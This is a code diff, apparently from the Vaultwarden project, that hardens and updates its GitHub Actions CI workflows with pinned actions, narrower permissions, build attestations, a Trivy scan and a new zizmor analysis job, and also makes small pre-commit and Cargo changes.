# Some checks to determine if we need to continue with building a new docker.
|
||||||
# We will skip this check if we are creating a tag, because that has the same hash as a previous run already.
|
# We will skip this check if we are creating a tag, because that has the same hash as a previous run already.
|
||||||
skip_check:
|
skip_check:
|
||||||
runs-on: ubuntu-22.04
|
# Only run this in the upstream repo and not on forks
|
||||||
if: ${{ github.repository == 'dani-garcia/vaultwarden' }}
|
if: ${{ github.repository == 'dani-garcia/vaultwarden' }}
|
||||||
|
name: Cancel older jobs when running
|
||||||
|
permissions:
|
||||||
|
actions: write
|
||||||
|
runs-on: ubuntu-24.04
|
||||||
outputs:
|
outputs:
|
||||||
should_skip: ${{ steps.skip_check.outputs.should_skip }}
|
should_skip: ${{ steps.skip_check.outputs.should_skip }}
|
||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Skip Duplicates Actions
|
- name: Skip Duplicates Actions
|
||||||
id: skip_check
|
id: skip_check
|
||||||
@@ -27,14 +34,20 @@ jobs:
|
|||||||
if: ${{ github.ref_type == 'branch' }}
|
if: ${{ github.ref_type == 'branch' }}
|
||||||
|
|
||||||
docker-build:
|
docker-build:
|
||||||
runs-on: ubuntu-22.04
|
|
||||||
timeout-minutes: 120
|
|
||||||
needs: skip_check
|
needs: skip_check
|
||||||
if: ${{ needs.skip_check.outputs.should_skip != 'true' && github.repository == 'dani-garcia/vaultwarden' }}
|
if: ${{ needs.skip_check.outputs.should_skip != 'true' && github.repository == 'dani-garcia/vaultwarden' }}
|
||||||
# Start a local docker registry to extract the final Alpine static build binaries
|
name: Build Vaultwarden containers
|
||||||
|
permissions:
|
||||||
|
packages: write
|
||||||
|
contents: read
|
||||||
|
attestations: write
|
||||||
|
id-token: write
|
||||||
|
runs-on: ubuntu-24.04
|
||||||
|
timeout-minutes: 120
|
||||||
|
# Start a local docker registry to extract the compiled binaries to upload as artifacts and attest them
|
||||||
services:
|
services:
|
||||||
registry:
|
registry:
|
||||||
image: registry:2
|
image: registry@sha256:1fc7de654f2ac1247f0b67e8a459e273b0993be7d2beda1f3f56fbf1001ed3e7 # v3.0.0
|
||||||
ports:
|
ports:
|
||||||
- 5000:5000
|
- 5000:5000
|
||||||
env:
|
env:
|
||||||
@@ -56,37 +69,42 @@ jobs:
|
|||||||
base_image: ["debian","alpine"]
|
base_image: ["debian","alpine"]
|
||||||
|
|
||||||
steps:
|
steps:
|
||||||
# Checkout the repo
|
|
||||||
- name: Checkout
|
|
||||||
uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1
|
|
||||||
with:
|
|
||||||
fetch-depth: 0
|
|
||||||
|
|
||||||
- name: Initialize QEMU binfmt support
|
- name: Initialize QEMU binfmt support
|
||||||
uses: docker/setup-qemu-action@68827325e0b33c7199eb31dd4e31fbe9023e06e3 # v3.0.0
|
uses: docker/setup-qemu-action@29109295f81e9208d7d86ff1c6c12d2833863392 # v3.6.0
|
||||||
with:
|
with:
|
||||||
platforms: "arm64,arm"
|
platforms: "arm64,arm"
|
||||||
|
|
||||||
# Start Docker Buildx
|
# Start Docker Buildx
|
||||||
- name: Setup Docker Buildx
|
- name: Setup Docker Buildx
|
||||||
uses: docker/setup-buildx-action@f95db51fddba0c2d1ec667646a06c2ce06100226 # v3.0.0
|
uses: docker/setup-buildx-action@e468171a9de216ec08956ac3ada2f0791b6bd435 # v3.11.1
|
||||||
# https://github.com/moby/buildkit/issues/3969
|
# https://github.com/moby/buildkit/issues/3969
|
||||||
# Also set max parallelism to 2, the default of 4 breaks GitHub Actions
|
# Also set max parallelism to 2, the default of 4 breaks GitHub Actions and causes OOMKills
|
||||||
with:
|
with:
|
||||||
config-inline: |
|
cache-binary: false
|
||||||
|
buildkitd-config-inline: |
|
||||||
[worker.oci]
|
[worker.oci]
|
||||||
max-parallelism = 2
|
max-parallelism = 2
|
||||||
driver-opts: |
|
driver-opts: |
|
||||||
network=host
|
network=host
|
||||||
|
|
||||||
|
# Checkout the repo
|
||||||
|
- name: Checkout
|
||||||
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 #v4.2.2
|
||||||
|
# We need fetch-depth of 0 so we also get all the tag metadata
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
# Determine Base Tags and Source Version
|
# Determine Base Tags and Source Version
|
||||||
- name: Determine Base Tags and Source Version
|
- name: Determine Base Tags and Source Version
|
||||||
shell: bash
|
shell: bash
|
||||||
|
env:
|
||||||
|
REF_TYPE: ${{ github.ref_type }}
|
||||||
run: |
|
run: |
|
||||||
# Check which main tag we are going to build determined by github.ref_type
|
# Check which main tag we are going to build determined by ref_type
|
||||||
if [[ "${{ github.ref_type }}" == "tag" ]]; then
|
if [[ "${REF_TYPE}" == "tag" ]]; then
|
||||||
echo "BASE_TAGS=latest,${GITHUB_REF#refs/*/}" | tee -a "${GITHUB_ENV}"
|
echo "BASE_TAGS=latest,${GITHUB_REF#refs/*/}" | tee -a "${GITHUB_ENV}"
|
||||||
elif [[ "${{ github.ref_type }}" == "branch" ]]; then
|
elif [[ "${REF_TYPE}" == "branch" ]]; then
|
||||||
echo "BASE_TAGS=testing" | tee -a "${GITHUB_ENV}"
|
echo "BASE_TAGS=testing" | tee -a "${GITHUB_ENV}"
|
||||||
fi
|
fi
|
||||||
|
|
||||||
@@ -102,7 +120,7 @@ jobs:
|
|||||||
|
|
||||||
# Login to Docker Hub
|
# Login to Docker Hub
|
||||||
- name: Login to Docker Hub
|
- name: Login to Docker Hub
|
||||||
uses: docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d # v3.0.0
|
uses: docker/login-action@74a5d142397b4f367a81961eba4e8cd7edddf772 # v3.4.0
|
||||||
with:
|
with:
|
||||||
username: ${{ secrets.DOCKERHUB_USERNAME }}
|
username: ${{ secrets.DOCKERHUB_USERNAME }}
|
||||||
password: ${{ secrets.DOCKERHUB_TOKEN }}
|
password: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||||
@@ -111,12 +129,14 @@ jobs:
|
|||||||
- name: Add registry for DockerHub
|
- name: Add registry for DockerHub
|
||||||
if: ${{ env.HAVE_DOCKERHUB_LOGIN == 'true' }}
|
if: ${{ env.HAVE_DOCKERHUB_LOGIN == 'true' }}
|
||||||
shell: bash
|
shell: bash
|
||||||
|
env:
|
||||||
|
DOCKERHUB_REPO: ${{ vars.DOCKERHUB_REPO }}
|
||||||
run: |
|
run: |
|
||||||
echo "CONTAINER_REGISTRIES=${{ vars.DOCKERHUB_REPO }}" | tee -a "${GITHUB_ENV}"
|
echo "CONTAINER_REGISTRIES=${DOCKERHUB_REPO}" | tee -a "${GITHUB_ENV}"
|
||||||
|
|
||||||
# Login to GitHub Container Registry
|
# Login to GitHub Container Registry
|
||||||
- name: Login to GitHub Container Registry
|
- name: Login to GitHub Container Registry
|
||||||
uses: docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d # v3.0.0
|
uses: docker/login-action@74a5d142397b4f367a81961eba4e8cd7edddf772 # v3.4.0
|
||||||
with:
|
with:
|
||||||
registry: ghcr.io
|
registry: ghcr.io
|
||||||
username: ${{ github.repository_owner }}
|
username: ${{ github.repository_owner }}
|
||||||
@@ -126,18 +146,14 @@ jobs:
|
|||||||
- name: Add registry for ghcr.io
|
- name: Add registry for ghcr.io
|
||||||
if: ${{ env.HAVE_GHCR_LOGIN == 'true' }}
|
if: ${{ env.HAVE_GHCR_LOGIN == 'true' }}
|
||||||
shell: bash
|
shell: bash
|
||||||
|
env:
|
||||||
|
GHCR_REPO: ${{ vars.GHCR_REPO }}
|
||||||
run: |
|
run: |
|
||||||
echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}${{ vars.GHCR_REPO }}" | tee -a "${GITHUB_ENV}"
|
echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}${GHCR_REPO}" | tee -a "${GITHUB_ENV}"
|
||||||
|
|
||||||
- name: Add registry for ghcr.io
|
|
||||||
if: ${{ env.HAVE_GHCR_LOGIN == 'true' }}
|
|
||||||
shell: bash
|
|
||||||
run: |
|
|
||||||
echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}${{ vars.GHCR_REPO }}" | tee -a "${GITHUB_ENV}"
|
|
||||||
|
|
||||||
# Login to Quay.io
|
# Login to Quay.io
|
||||||
- name: Login to Quay.io
|
- name: Login to Quay.io
|
||||||
uses: docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d # v3.0.0
|
uses: docker/login-action@74a5d142397b4f367a81961eba4e8cd7edddf772 # v3.4.0
|
||||||
with:
|
with:
|
||||||
registry: quay.io
|
registry: quay.io
|
||||||
username: ${{ secrets.QUAY_USERNAME }}
|
username: ${{ secrets.QUAY_USERNAME }}
|
||||||
@@ -147,17 +163,22 @@ jobs:
|
|||||||
- name: Add registry for Quay.io
|
- name: Add registry for Quay.io
|
||||||
if: ${{ env.HAVE_QUAY_LOGIN == 'true' }}
|
if: ${{ env.HAVE_QUAY_LOGIN == 'true' }}
|
||||||
shell: bash
|
shell: bash
|
||||||
|
env:
|
||||||
|
QUAY_REPO: ${{ vars.QUAY_REPO }}
|
||||||
run: |
|
run: |
|
||||||
echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}${{ vars.QUAY_REPO }}" | tee -a "${GITHUB_ENV}"
|
echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}${QUAY_REPO}" | tee -a "${GITHUB_ENV}"
|
||||||
|
|
||||||
- name: Configure build cache from/to
|
- name: Configure build cache from/to
|
||||||
shell: bash
|
shell: bash
|
||||||
|
env:
|
||||||
|
GHCR_REPO: ${{ vars.GHCR_REPO }}
|
||||||
|
BASE_IMAGE: ${{ matrix.base_image }}
|
||||||
run: |
|
run: |
|
||||||
#
|
#
|
||||||
# Check if there is a GitHub Container Registry Login and use it for caching
|
# Check if there is a GitHub Container Registry Login and use it for caching
|
||||||
if [[ -n "${HAVE_GHCR_LOGIN}" ]]; then
|
if [[ -n "${HAVE_GHCR_LOGIN}" ]]; then
|
||||||
echo "BAKE_CACHE_FROM=type=registry,ref=${{ vars.GHCR_REPO }}-buildcache:${{ matrix.base_image }}" | tee -a "${GITHUB_ENV}"
|
echo "BAKE_CACHE_FROM=type=registry,ref=${GHCR_REPO}-buildcache:${BASE_IMAGE}" | tee -a "${GITHUB_ENV}"
|
||||||
echo "BAKE_CACHE_TO=type=registry,ref=${{ vars.GHCR_REPO }}-buildcache:${{ matrix.base_image }},mode=max" | tee -a "${GITHUB_ENV}"
|
echo "BAKE_CACHE_TO=type=registry,ref=${GHCR_REPO}-buildcache:${BASE_IMAGE},compression=zstd,mode=max" | tee -a "${GITHUB_ENV}"
|
||||||
else
|
else
|
||||||
echo "BAKE_CACHE_FROM="
|
echo "BAKE_CACHE_FROM="
|
||||||
echo "BAKE_CACHE_TO="
|
echo "BAKE_CACHE_TO="
|
||||||
@@ -165,13 +186,13 @@ jobs:
|
|||||||
#
|
#
|
||||||
|
|
||||||
- name: Add localhost registry
|
- name: Add localhost registry
|
||||||
if: ${{ matrix.base_image == 'alpine' }}
|
|
||||||
shell: bash
|
shell: bash
|
||||||
run: |
|
run: |
|
||||||
echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}localhost:5000/vaultwarden/server" | tee -a "${GITHUB_ENV}"
|
echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}localhost:5000/vaultwarden/server" | tee -a "${GITHUB_ENV}"
|
||||||
|
|
||||||
- name: Bake ${{ matrix.base_image }} containers
|
- name: Bake ${{ matrix.base_image }} containers
|
||||||
uses: docker/bake-action@849707117b03d39aba7924c50a10376a69e88d7d # v4.1.0
|
id: bake_vw
|
||||||
|
uses: docker/bake-action@37816e747588cb137173af99ab33873600c46ea8 # v6.8.0
|
||||||
env:
|
env:
|
||||||
BASE_TAGS: "${{ env.BASE_TAGS }}"
|
BASE_TAGS: "${{ env.BASE_TAGS }}"
|
||||||
SOURCE_COMMIT: "${{ env.SOURCE_COMMIT }}"
|
SOURCE_COMMIT: "${{ env.SOURCE_COMMIT }}"
|
||||||
@@ -181,78 +202,121 @@ jobs:
|
|||||||
with:
|
with:
|
||||||
pull: true
|
pull: true
|
||||||
push: true
|
push: true
|
||||||
|
source: .
|
||||||
files: docker/docker-bake.hcl
|
files: docker/docker-bake.hcl
|
||||||
targets: "${{ matrix.base_image }}-multi"
|
targets: "${{ matrix.base_image }}-multi"
|
||||||
set: |
|
set: |
|
||||||
*.cache-from=${{ env.BAKE_CACHE_FROM }}
|
*.cache-from=${{ env.BAKE_CACHE_FROM }}
|
||||||
*.cache-to=${{ env.BAKE_CACHE_TO }}
|
*.cache-to=${{ env.BAKE_CACHE_TO }}
|
||||||
|
|
||||||
|
- name: Extract digest SHA
|
||||||
|
shell: bash
|
||||||
|
env:
|
||||||
|
BAKE_METADATA: ${{ steps.bake_vw.outputs.metadata }}
|
||||||
|
BASE_IMAGE: ${{ matrix.base_image }}
|
||||||
|
run: |
|
||||||
|
GET_DIGEST_SHA="$(jq -r --arg base "$BASE_IMAGE" '.[$base + "-multi"]."containerimage.digest"' <<< "${BAKE_METADATA}")"
|
||||||
|
echo "DIGEST_SHA=${GET_DIGEST_SHA}" | tee -a "${GITHUB_ENV}"
|
||||||
|
|
||||||
|
# Attest container images
|
||||||
|
- name: Attest - docker.io - ${{ matrix.base_image }}
|
||||||
|
if: ${{ env.HAVE_DOCKERHUB_LOGIN == 'true' && steps.bake_vw.outputs.metadata != ''}}
|
||||||
|
uses: actions/attest-build-provenance@e8998f949152b193b063cb0ec769d69d929409be # v2.4.0
|
||||||
|
with:
|
||||||
|
subject-name: ${{ vars.DOCKERHUB_REPO }}
|
||||||
|
subject-digest: ${{ env.DIGEST_SHA }}
|
||||||
|
push-to-registry: true
|
||||||
|
|
||||||
|
- name: Attest - ghcr.io - ${{ matrix.base_image }}
|
||||||
|
if: ${{ env.HAVE_GHCR_LOGIN == 'true' && steps.bake_vw.outputs.metadata != ''}}
|
||||||
|
uses: actions/attest-build-provenance@e8998f949152b193b063cb0ec769d69d929409be # v2.4.0
|
||||||
|
with:
|
||||||
|
subject-name: ${{ vars.GHCR_REPO }}
|
||||||
|
subject-digest: ${{ env.DIGEST_SHA }}
|
||||||
|
push-to-registry: true
|
||||||
|
|
||||||
|
- name: Attest - quay.io - ${{ matrix.base_image }}
|
||||||
|
if: ${{ env.HAVE_QUAY_LOGIN == 'true' && steps.bake_vw.outputs.metadata != ''}}
|
||||||
|
uses: actions/attest-build-provenance@e8998f949152b193b063cb0ec769d69d929409be # v2.4.0
|
||||||
|
with:
|
||||||
|
subject-name: ${{ vars.QUAY_REPO }}
|
||||||
|
subject-digest: ${{ env.DIGEST_SHA }}
|
||||||
|
push-to-registry: true
|
||||||
|
|
||||||
|
|
||||||
# Extract the Alpine binaries from the containers
|
# Extract the Alpine binaries from the containers
|
||||||
- name: Extract binaries
|
- name: Extract binaries
|
||||||
if: ${{ matrix.base_image == 'alpine' }}
|
|
||||||
shell: bash
|
shell: bash
|
||||||
|
env:
|
||||||
|
REF_TYPE: ${{ github.ref_type }}
|
||||||
|
BASE_IMAGE: ${{ matrix.base_image }}
|
||||||
run: |
|
run: |
|
||||||
# Check which main tag we are going to build determined by github.ref_type
|
# Check which main tag we are going to build determined by ref_type
|
||||||
if [[ "${{ github.ref_type }}" == "tag" ]]; then
|
if [[ "${REF_TYPE}" == "tag" ]]; then
|
||||||
EXTRACT_TAG="latest"
|
EXTRACT_TAG="latest"
|
||||||
elif [[ "${{ github.ref_type }}" == "branch" ]]; then
|
elif [[ "${REF_TYPE}" == "branch" ]]; then
|
||||||
EXTRACT_TAG="testing"
|
EXTRACT_TAG="testing"
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
# Check which base_image was used and append -alpine if needed
|
||||||
|
if [[ "${BASE_IMAGE}" == "alpine" ]]; then
|
||||||
|
EXTRACT_TAG="${EXTRACT_TAG}-alpine"
|
||||||
|
fi
|
||||||
|
|
||||||
# After each extraction the image is removed.
|
# After each extraction the image is removed.
|
||||||
# This is needed because using different platforms doesn't trigger a new pull/download
|
# This is needed because using different platforms doesn't trigger a new pull/download
|
||||||
|
|
||||||
# Extract amd64 binary
|
# Extract amd64 binary
|
||||||
docker create --name amd64 --platform=linux/amd64 "vaultwarden/server:${EXTRACT_TAG}-alpine"
|
docker create --name amd64 --platform=linux/amd64 "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
|
||||||
docker cp amd64:/vaultwarden vaultwarden-amd64
|
docker cp amd64:/vaultwarden vaultwarden-amd64-${BASE_IMAGE}
|
||||||
docker rm --force amd64
|
docker rm --force amd64
|
||||||
docker rmi --force "vaultwarden/server:${EXTRACT_TAG}-alpine"
|
docker rmi --force "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
|
||||||
|
|
||||||
# Extract arm64 binary
|
# Extract arm64 binary
|
||||||
docker create --name arm64 --platform=linux/arm64 "vaultwarden/server:${EXTRACT_TAG}-alpine"
|
docker create --name arm64 --platform=linux/arm64 "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
|
||||||
docker cp arm64:/vaultwarden vaultwarden-arm64
|
docker cp arm64:/vaultwarden vaultwarden-arm64-${BASE_IMAGE}
|
||||||
docker rm --force arm64
|
docker rm --force arm64
|
||||||
docker rmi --force "vaultwarden/server:${EXTRACT_TAG}-alpine"
|
docker rmi --force "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
|
||||||
|
|
||||||
# Extract armv7 binary
|
# Extract armv7 binary
|
||||||
docker create --name armv7 --platform=linux/arm/v7 "vaultwarden/server:${EXTRACT_TAG}-alpine"
|
docker create --name armv7 --platform=linux/arm/v7 "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
|
||||||
docker cp armv7:/vaultwarden vaultwarden-armv7
|
docker cp armv7:/vaultwarden vaultwarden-armv7-${BASE_IMAGE}
|
||||||
docker rm --force armv7
|
docker rm --force armv7
|
||||||
docker rmi --force "vaultwarden/server:${EXTRACT_TAG}-alpine"
|
docker rmi --force "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
|
||||||
|
|
||||||
# Extract armv6 binary
|
# Extract armv6 binary
|
||||||
docker create --name armv6 --platform=linux/arm/v6 "vaultwarden/server:${EXTRACT_TAG}-alpine"
|
docker create --name armv6 --platform=linux/arm/v6 "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
|
||||||
docker cp armv6:/vaultwarden vaultwarden-armv6
|
docker cp armv6:/vaultwarden vaultwarden-armv6-${BASE_IMAGE}
|
||||||
docker rm --force armv6
|
docker rm --force armv6
|
||||||
docker rmi --force "vaultwarden/server:${EXTRACT_TAG}-alpine"
|
docker rmi --force "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
|
||||||
|
|
||||||
# Upload artifacts to Github Actions
|
# Upload artifacts to Github Actions and Attest the binaries
|
||||||
- name: "Upload amd64 artifact"
|
- name: "Upload amd64 artifact ${{ matrix.base_image }}"
|
||||||
uses: actions/upload-artifact@5d5d22a31266ced268874388b861e4b58bb5c2f3 # v4.3.1
|
uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
|
||||||
if: ${{ matrix.base_image == 'alpine' }}
|
|
||||||
with:
|
with:
|
||||||
name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-amd64
|
name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-amd64-${{ matrix.base_image }}
|
||||||
path: vaultwarden-amd64
|
path: vaultwarden-amd64-${{ matrix.base_image }}
|
||||||
|
|
||||||
- name: "Upload arm64 artifact"
|
- name: "Upload arm64 artifact ${{ matrix.base_image }}"
|
||||||
uses: actions/upload-artifact@5d5d22a31266ced268874388b861e4b58bb5c2f3 # v4.3.1
|
uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
|
||||||
if: ${{ matrix.base_image == 'alpine' }}
|
|
||||||
with:
|
with:
|
||||||
name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-arm64
|
name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-arm64-${{ matrix.base_image }}
|
||||||
path: vaultwarden-arm64
|
path: vaultwarden-arm64-${{ matrix.base_image }}
|
||||||
|
|
||||||
- name: "Upload armv7 artifact"
|
- name: "Upload armv7 artifact ${{ matrix.base_image }}"
|
||||||
uses: actions/upload-artifact@5d5d22a31266ced268874388b861e4b58bb5c2f3 # v4.3.1
|
uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
|
||||||
if: ${{ matrix.base_image == 'alpine' }}
|
|
||||||
with:
|
with:
|
||||||
name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-armv7
|
name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-armv7-${{ matrix.base_image }}
|
||||||
path: vaultwarden-armv7
|
path: vaultwarden-armv7-${{ matrix.base_image }}
|
||||||
|
|
||||||
- name: "Upload armv6 artifact"
|
- name: "Upload armv6 artifact ${{ matrix.base_image }}"
|
||||||
uses: actions/upload-artifact@5d5d22a31266ced268874388b861e4b58bb5c2f3 # v4.3.1
|
uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
|
||||||
if: ${{ matrix.base_image == 'alpine' }}
|
|
||||||
with:
|
with:
|
||||||
name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-armv6
|
name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-armv6-${{ matrix.base_image }}
|
||||||
path: vaultwarden-armv6
|
path: vaultwarden-armv6-${{ matrix.base_image }}
|
||||||
|
|
||||||
|
- name: "Attest artifacts ${{ matrix.base_image }}"
|
||||||
|
uses: actions/attest-build-provenance@e8998f949152b193b063cb0ec769d69d929409be # v2.4.0
|
||||||
|
with:
|
||||||
|
subject-path: vaultwarden-*
|
||||||
# End Upload artifacts to Github Actions
|
# End Upload artifacts to Github Actions
|
||||||
|
|||||||
8
.github/workflows/releasecache-cleanup.yml
vendored
8
.github/workflows/releasecache-cleanup.yml
vendored
@@ -1,3 +1,6 @@
|
|||||||
|
name: Cleanup
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
on:
|
on:
|
||||||
workflow_dispatch:
|
workflow_dispatch:
|
||||||
inputs:
|
inputs:
|
||||||
@@ -9,11 +12,12 @@ on:
|
|||||||
schedule:
|
schedule:
|
||||||
- cron: '0 1 * * FRI'
|
- cron: '0 1 * * FRI'
|
||||||
|
|
||||||
name: Cleanup
|
|
||||||
jobs:
|
jobs:
|
||||||
releasecache-cleanup:
|
releasecache-cleanup:
|
||||||
name: Releasecache Cleanup
|
name: Releasecache Cleanup
|
||||||
runs-on: ubuntu-22.04
|
permissions:
|
||||||
|
packages: write
|
||||||
|
runs-on: ubuntu-24.04
|
||||||
continue-on-error: true
|
continue-on-error: true
|
||||||
timeout-minutes: 30
|
timeout-minutes: 30
|
||||||
steps:
|
steps:
|
||||||
|
|||||||
39
.github/workflows/trivy.yml
vendored
39
.github/workflows/trivy.yml
vendored
@@ -1,34 +1,45 @@
|
|||||||
name: trivy
|
name: Trivy
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
on:
|
on:
|
||||||
push:
|
push:
|
||||||
branches:
|
branches:
|
||||||
- main
|
- main
|
||||||
|
|
||||||
tags:
|
tags:
|
||||||
- '*'
|
- '*'
|
||||||
pull_request:
|
|
||||||
branches: [ "main" ]
|
|
||||||
schedule:
|
|
||||||
- cron: '00 12 * * *'
|
|
||||||
|
|
||||||
permissions:
|
pull_request:
|
||||||
contents: read
|
branches:
|
||||||
|
- main
|
||||||
|
|
||||||
|
schedule:
|
||||||
|
- cron: '08 11 * * *'
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
trivy-scan:
|
trivy-scan:
|
||||||
name: Check
|
# Only run this in the upstream repo and not on forks
|
||||||
runs-on: ubuntu-22.04
|
# When all forks run this at the same time, it is causing `Too Many Requests` issues
|
||||||
timeout-minutes: 30
|
if: ${{ github.repository == 'dani-garcia/vaultwarden' }}
|
||||||
|
name: Trivy Scan
|
||||||
permissions:
|
permissions:
|
||||||
contents: read
|
contents: read
|
||||||
security-events: write
|
|
||||||
actions: read
|
actions: read
|
||||||
|
security-events: write
|
||||||
|
runs-on: ubuntu-24.04
|
||||||
|
timeout-minutes: 30
|
||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 #v4.1.1
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 #v4.2.2
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Run Trivy vulnerability scanner
|
- name: Run Trivy vulnerability scanner
|
||||||
uses: aquasecurity/trivy-action@d43c1f16c00cfd3978dde6c07f4bbcf9eb6993ca # v0.16.1
|
uses: aquasecurity/trivy-action@dc5a429b52fcf669ce959baa2c2dd26090d2a6c4 # v0.32.0
|
||||||
|
env:
|
||||||
|
TRIVY_DB_REPOSITORY: docker.io/aquasec/trivy-db:2,public.ecr.aws/aquasecurity/trivy-db:2,ghcr.io/aquasecurity/trivy-db:2
|
||||||
|
TRIVY_JAVA_DB_REPOSITORY: docker.io/aquasec/trivy-java-db:1,public.ecr.aws/aquasecurity/trivy-java-db:1,ghcr.io/aquasecurity/trivy-java-db:1
|
||||||
with:
|
with:
|
||||||
scan-type: repo
|
scan-type: repo
|
||||||
ignore-unfixed: true
|
ignore-unfixed: true
|
||||||
@@ -37,6 +48,6 @@ jobs:
|
|||||||
severity: CRITICAL,HIGH
|
severity: CRITICAL,HIGH
|
||||||
|
|
||||||
- name: Upload Trivy scan results to GitHub Security tab
|
- name: Upload Trivy scan results to GitHub Security tab
|
||||||
uses: github/codeql-action/upload-sarif@b7bf0a3ed3ecfa44160715d7c442788f65f0f923 # v3.23.2
|
uses: github/codeql-action/upload-sarif@181d5eefc20863364f96762470ba6f862bdef56b # v3.29.2
|
||||||
with:
|
with:
|
||||||
sarif_file: 'trivy-results.sarif'
|
sarif_file: 'trivy-results.sarif'
|
||||||
|
|||||||
28
.github/workflows/zizmor.yml
vendored
Normal file
28
.github/workflows/zizmor.yml
vendored
Normal file
@@ -0,0 +1,28 @@
|
|||||||
|
name: Security Analysis with zizmor
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches: ["main"]
|
||||||
|
pull_request:
|
||||||
|
branches: ["**"]
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
zizmor:
|
||||||
|
name: Run zizmor
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
security-events: write
|
||||||
|
steps:
|
||||||
|
- name: Checkout repository
|
||||||
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
|
- name: Run zizmor
|
||||||
|
uses: zizmorcore/zizmor-action@f52a838cfabf134edcbaa7c8b3677dde20045018 # v0.1.1
|
||||||
|
with:
|
||||||
|
# intentionally not scanning the entire repository,
|
||||||
|
# since it contains integration tests.
|
||||||
|
inputs: ./.github/
|
||||||
@@ -1,7 +1,7 @@
|
|||||||
---
|
---
|
||||||
repos:
|
repos:
|
||||||
- repo: https://github.com/pre-commit/pre-commit-hooks
|
- repo: https://github.com/pre-commit/pre-commit-hooks
|
||||||
rev: v4.5.0
|
rev: v5.0.0
|
||||||
hooks:
|
hooks:
|
||||||
- id: check-yaml
|
- id: check-yaml
|
||||||
- id: check-json
|
- id: check-json
|
||||||
@@ -31,7 +31,7 @@ repos:
|
|||||||
language: system
|
language: system
|
||||||
args: ["--features", "sqlite,mysql,postgresql,enable_mimalloc", "--"]
|
args: ["--features", "sqlite,mysql,postgresql,enable_mimalloc", "--"]
|
||||||
types_or: [rust, file]
|
types_or: [rust, file]
|
||||||
files: (Cargo.toml|Cargo.lock|rust-toolchain|.*\.rs$)
|
files: (Cargo.toml|Cargo.lock|rust-toolchain.toml|rustfmt.toml|.*\.rs$)
|
||||||
pass_filenames: false
|
pass_filenames: false
|
||||||
- id: cargo-clippy
|
- id: cargo-clippy
|
||||||
name: cargo clippy
|
name: cargo clippy
|
||||||
@@ -40,5 +40,13 @@ repos:
|
|||||||
language: system
|
language: system
|
||||||
args: ["--features", "sqlite,mysql,postgresql,enable_mimalloc", "--", "-D", "warnings"]
|
args: ["--features", "sqlite,mysql,postgresql,enable_mimalloc", "--", "-D", "warnings"]
|
||||||
types_or: [rust, file]
|
types_or: [rust, file]
|
||||||
files: (Cargo.toml|Cargo.lock|rust-toolchain|clippy.toml|.*\.rs$)
|
files: (Cargo.toml|Cargo.lock|rust-toolchain.toml|rustfmt.toml|.*\.rs$)
|
||||||
pass_filenames: false
|
pass_filenames: false
|
||||||
|
- id: check-docker-templates
|
||||||
|
name: check docker templates
|
||||||
|
description: Check if the Docker templates are updated
|
||||||
|
language: system
|
||||||
|
entry: sh
|
||||||
|
args:
|
||||||
|
- "-c"
|
||||||
|
- "cd docker && make"
|
||||||
|
|||||||
3992
Cargo.lock
generated
3992
Cargo.lock
generated
File diff suppressed because it is too large
Load Diff
183
Cargo.toml
183
Cargo.toml
@@ -1,9 +1,12 @@
|
|||||||
|
[workspace]
|
||||||
|
members = ["macros"]
|
||||||
|
|
||||||
[package]
|
[package]
|
